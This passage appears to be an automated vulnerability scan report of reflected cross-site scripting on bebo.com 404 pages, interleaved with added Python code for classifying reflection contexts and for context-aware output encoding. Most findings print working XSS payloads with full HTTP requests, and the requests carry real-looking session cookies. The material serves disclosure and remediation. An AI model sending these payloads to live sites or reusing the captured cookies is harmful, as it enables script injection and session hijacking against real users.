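    """Return (offset, echoed_text) for whatever sits between prefix and
    suffix, or None if the probe was not reflected. The random prefix and
    suffix locate the reflection even when the payload itself was altered."""
    start = body.find(prefix)
    if start == -1:
        return None
    start += len(prefix)
    end = body.find(suffix, start)
    if end == -1:
        return None
    return start, body[start:end]


def js_open_quote(script_src):
    """Scan JavaScript source and return the quote character of a string
    literal still open at the end, or None. Backslash escapes are honoured."""
    quote = None
    i = 0
    while i < len(script_src):
        c = script_src[i]
        if quote is not None:
            if c == "\\":
                i += 1            # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        i += 1
    return quote


def context_at(body, offset):
    """Name the HTML/JS context at a character offset in body."""
    before = body[:offset]
    lower = before.lower()
    open_script = lower.rfind("<script")
    close_script = lower.rfind("</script")
    tag_end = before.find(">", open_script) if open_script != -1 else -1
    if open_script > close_script and tag_end != -1:
        # Inside a <script> block: is a string literal open at the reflection?
        q = js_open_quote(before[tag_end + 1:])
        if q == "'":
            return "JavaScript string (single-quoted)"
        if q == '"':
            return "JavaScript string (double-quoted)"
        return "JavaScript code (outside a string literal)"
    if before.rfind("<") > before.rfind(">"):
        # Inside a tag: which kind of attribute value, if any?
        if re.search(r'=\s*"[^"]*$', before):
            return "HTML attribute value (double-quoted)"
        if re.search(r"=\s*'[^']*$", before):
            return "HTML attribute value (single-quoted)"
        if re.search(r"=\s*[^\s\"'=<>`]*$", before):
            return "HTML attribute value (unquoted)"
        return "inside an HTML tag"
    return "HTML text between tags"


def classify(body, prefix, payload, suffix):
    """payload is the probe as the application sees it, i.e. URL-decoded."""
    hit = find_reflection(body, prefix, suffix)
    if hit is None:
        return {"reflected": False}
    offset, echoed = hit
    return {
        "reflected": True,
        "verbatim": echoed == payload,
        "encoded": echoed != payload and html.unescape(echoed) == payload,
        "context": context_at(body, offset),
        "echoed": echoed,
    }


# From the report: the 404 page echoing REST URL parameter 2 as text.
TEXT_BODY = ('<div class="mod">ERROR 404: Sorry, we dont have no '
             '/c/about99129<script>alert(1)</script>0069156af62/help page, '
             'please try again.</div>')
# Constructed: the attribute and script reflections the findings describe.
ATTR_BODY = ('<input type="hidden" name="page" '
             'value="/c/aboutf3704"><img src=a onerror=alert(1)>c709de1f9e0/help">')
JS_BODY = "<script>var page = '/c/aboute955d';bd88673f7f6/help';</script>"
# Constructed: the text reflection after the fix (HTML-encoded).
ENCODED_BODY = ('<div class="mod">ERROR 404: Sorry, we dont have no '
                '/c/about99129&lt;script&gt;alert(1)&lt;/script&gt;0069156af62'
                '/help page, please try again.</div>')

SAMPLES = [
    (TEXT_BODY, "99129", "<script>alert(1)</script>", "0069156af62"),
    (ATTR_BODY, "f3704", unquote('"><img%20src%3da%20onerror%3dalert(1)>'), "c709de1f9e0"),
    (JS_BODY, "e955d", unquote("'%3b"), "bd88673f7f6"),
    (ENCODED_BODY, "99129", "<script>alert(1)</script>", "0069156af62"),
]

if __name__ == "__main__":
    for body, prefix, payload, suffix in SAMPLES:
        print(classify(body, prefix, payload, suffix))
```

The "encoded" flag is the one to watch after a fix: a probe that still comes back, but only as entities, is no longer a finding in a text or attribute context, whereas in a script context entity encoding is not the right encoder at all.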
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3704"><img%20src%3da%20onerror%3dalert(1)>c709de1f9e0 was submitted in the REST URL parameter 2. This input was echoed as f3704"><img src=a onerror=alert(1)>c709de1f9e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aboutf3704"><img%20src%3da%20onerror%3dalert(1)>c709de1f9e0/help HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10855
Date: Mon, 15 Nov 2010 22:43:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e955d'%3bbd88673f7f6 was submitted in the REST URL parameter 2. This input was echoed as e955d';bd88673f7f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aboute955d'%3bbd88673f7f6/help HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10561
Date: Mon, 15 Nov 2010 22:43:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
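The findings so far copy the same path value into three different sinks: HTML text between tags, a quoted attribute value, and a single-quoted JavaScript string literal. Each needs its own encoder, and the remediation text above singles out the script context because a probe such as e955d'%3bbd88673f7f6 terminates an unencoded literal without containing a single < character, so filtering tags does nothing for it. The block below is an added example of context-aware encoding, not the application's code: the 404 template is a constructed stand-in for the real page, and html_text, html_attr, js_string and the other names are this example's own.

```python
"""
Context-aware output encoding for the three sinks the findings identify.
Added example: not the application's code. The 404 template is a constructed
stand-in for the real page, and every function name is this example's own.
"""
import html
import json
import re


def html_text(s):
    """Text between tags: & < > must be encoded; quotes may be left alone."""
    return html.escape(s, quote=False)


def html_attr(s):
    """Quoted attribute value: encode both quote characters as well, so the
    data cannot close the attribute and open a new tag (the "><img ...> case)."""
    return html.escape(s, quote=True)


def js_string(s):
    """For data inside a JavaScript string literal in an inline <script>.
    json.dumps escapes backslash, double quote, control characters and (with
    ensure_ascii) U+2028/U+2029; the extra replacements cover the single quote,
    so the result is safe in either quote style, and < > &, so the data can
    never contain a literal </script> or an entity."""
    out = json.dumps(s)[1:-1]                 # drop the surrounding double quotes
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"),
                    (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def roundtrip_ok(s):
    """The encoder is lossless: a JS/JSON parser recovers the original value."""
    return json.loads('"' + js_string(s) + '"') == s


# Constructed stand-in for the 404 page, with the path copied into all three
# contexts named in the findings.
TEMPLATE = (
    '<div class="mod">ERROR 404: Sorry, we dont have no {text} page, '
    'please try again.</div>\n'
    '<input type="hidden" name="page" value="{attr}">\n'
    "<script>var page = '{js}';</script>"
)


def render_unsafe(path):
    """What the findings describe: the raw path lands in every context."""
    return TEMPLATE.format(text=path, attr=path, js=path)


def render_safe(path):
    """Each copy encoded for the one context it is written into."""
    return TEMPLATE.format(text=html_text(path), attr=html_attr(path),
                           js=js_string(path))


def inline_script(path, encode):
    """Just the script statement, to look at the string-context sink alone."""
    return "var page = '{}';".format(js_string(path) if encode else path)


def literal_terminated(statement):
    """True when the data broke out of the single-quoted literal. A closed
    literal holding the data contributes exactly two unescaped quotes; the
    report's '%3b probe adds a third, so the rest is parsed as code even
    though the probe contains no '<'."""
    return len(re.findall(r"(?<!\\)'", statement)) != 2


# Probes from the report, as the application sees them after URL-decoding
PROBES = {
    "text": "/c/about99129<script>alert(1)</script>0069156af62/help",
    "attr": '/c/aboutf3704"><img src=a onerror=alert(1)>c709de1f9e0/help',
    "js": "/c/aboute955d';bd88673f7f6/help",
}

if __name__ == "__main__":
    js_probe = PROBES["js"]
    print("unencoded literal terminated:",
          literal_terminated(inline_script(js_probe, encode=False)))
    print("encoded literal terminated:  ",
          literal_terminated(inline_script(js_probe, encode=True)))
    for path in PROBES.values():
        print(render_safe(path))
```

In a Java application such as the one served by Resin here, the same three encoders exist in the OWASP Java Encoder as Encode.forHtml, Encode.forHtmlAttribute and Encode.forJavaScript. The property that matters is that each copy of the value is encoded for exactly the context it is written into; a single HTML-entity pass applied everywhere leaves the script sink open, which is why the remediation text prefers not to echo the value into a script at all.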
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa620'%3ba89af79cc06 was submitted in the REST URL parameter 3. This input was echoed as fa620';a89af79cc06 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/about/helpfa620'%3ba89af79cc06 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10285
Date: Mon, 15 Nov 2010 22:43:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac466"><img%20src%3da%20onerror%3dalert(1)>17e95ffc512 was submitted in the REST URL parameter 3. This input was echoed as ac466"><img src=a onerror=alert(1)>17e95ffc512 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/about/helpac466"><img%20src%3da%20onerror%3dalert(1)>17e95ffc512 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10573
Date: Mon, 15 Nov 2010 22:43:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d960<img%20src%3da%20onerror%3dalert(1)>d77a0fb3b97 was submitted in the REST URL parameter 3. This input was echoed as 7d960<img src=a onerror=alert(1)>d77a0fb3b97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/about/help7d960<img%20src%3da%20onerror%3dalert(1)>d77a0fb3b97 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10555
Date: Mon, 15 Nov 2010 22:43:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3970e'><script>alert(1)</script>66ea4f6749b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about/help3970e'><script>alert(1)</script>66ea4f6749b HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10479
Date: Mon, 15 Nov 2010 22:43:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c949'%3b7bd4a0a8560 was submitted in the REST URL parameter 2. This input was echoed as 3c949';7bd4a0a8560 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aol_auth3c949'%3b7bd4a0a8560 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10543
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 565cb'><script>alert(1)</script>09c8b7bebd2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth565cb'><script>alert(1)</script>09c8b7bebd2 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10754
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5bd4<script>alert(1)</script>430c1f12055 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_authb5bd4<script>alert(1)</script>430c1f12055 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10736
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/aol_authb5bd4<script>alert(1)</script>430c1f12055 page, please try again.</div>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30858"><img%20src%3da%20onerror%3dalert(1)>d3254f8f610 was submitted in the REST URL parameter 2. This input was echoed as 30858"><img src=a onerror=alert(1)>d3254f8f610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_auth30858"><img%20src%3da%20onerror%3dalert(1)>d3254f8f610 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10837
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3545e<script>alert(1)</script>0a64feb99b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth3545e<script>alert(1)</script>0a64feb99b0/sgo HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10772
Date: Mon, 15 Nov 2010 22:43:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/aol_auth3545e<script>alert(1)</script>0a64feb99b0/sgo page, please try again.</div>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64994'><script>alert(1)</script>dac45bd9912 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth64994'><script>alert(1)</script>dac45bd9912/sgo HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10790
Date: Mon, 15 Nov 2010 22:43:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3831'%3bdd152150edb was submitted in the REST URL parameter 2. This input was echoed as e3831';dd152150edb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aol_authe3831'%3bdd152150edb/sgo HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10579
Date: Mon, 15 Nov 2010 22:43:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0756"><img%20src%3da%20onerror%3dalert(1)>5cf17fe1f0f was submitted in the REST URL parameter 2. This input was echoed as d0756"><img src=a onerror=alert(1)>5cf17fe1f0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_authd0756"><img%20src%3da%20onerror%3dalert(1)>5cf17fe1f0f/sgo HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;

Response
